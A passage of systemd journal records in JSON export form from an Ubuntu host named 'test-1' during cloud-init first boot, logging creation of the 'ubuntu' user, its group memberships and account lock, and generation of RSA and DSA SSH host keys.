"b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'lxd'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311609" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=289;b=e2b08827b5804427b422c10c84f1567e;m=290909d;t=5bd16df541004;x=7439e56038c0c4bf", "__REALTIME_TIMESTAMP" : "1615280817311748", "__MONOTONIC_TIMESTAMP" : "43028637", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'netdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311741" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28a;b=e2b08827b5804427b422c10c84f1567e;m=2933baf;t=5bd16df56bb16;x=1b509b93a3ec76a9", "__REALTIME_TIMESTAMP" : "1615280817486614", "__MONOTONIC_TIMESTAMP" : "43203503", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "passwd", "SYSLOG_PID" : "740", "MESSAGE" : "password for 'ubuntu' changed by 'root'", "_PID" : "740", "_COMM" : "passwd", "_EXE" : "/usr/bin/passwd", "_CMDLINE" : "passwd -l ubuntu", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817486592" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28b;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5ca7bdd0ee6da0a6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private rsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28c;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2d2b08f02c587437", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_rsa_key." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28d;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=81dee9f6fe1e28cd", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_rsa_key.pub." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28e;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28f;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=27784decd912f835", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:yknRoTzFSZARXtHupUbaRHJq3cqluJqyPejk+7QaGXg root@test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=290;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=291;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=673b6c2297980d5b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[RSA 2048]----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=292;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2d550c1613250691", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +B*+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=293;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c654081db1fa9273", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o.=+.+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=294;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=f53676ea4700ae3c", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| * .B . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=295;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=31ca3380fd6da014", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . oo = + |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=296;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ce99318b887eb5d2", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . E ..SO * |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=297;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=10838fe541ff893b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . = oo O |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=298;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c0e449122af7cdb4", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +.= o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=299;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=55377504886d45e3", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| oo+.o. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29a;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=23834d86ee1d4954", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .***o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29b;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29c;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d4bb71a15fccef51", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private dsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29d;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d0a88cda53bddb19", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_dsa_key." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29e;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2a7073f3626f089b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_dsa_key.pub." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29f;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=84c15c05befb1e39", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", 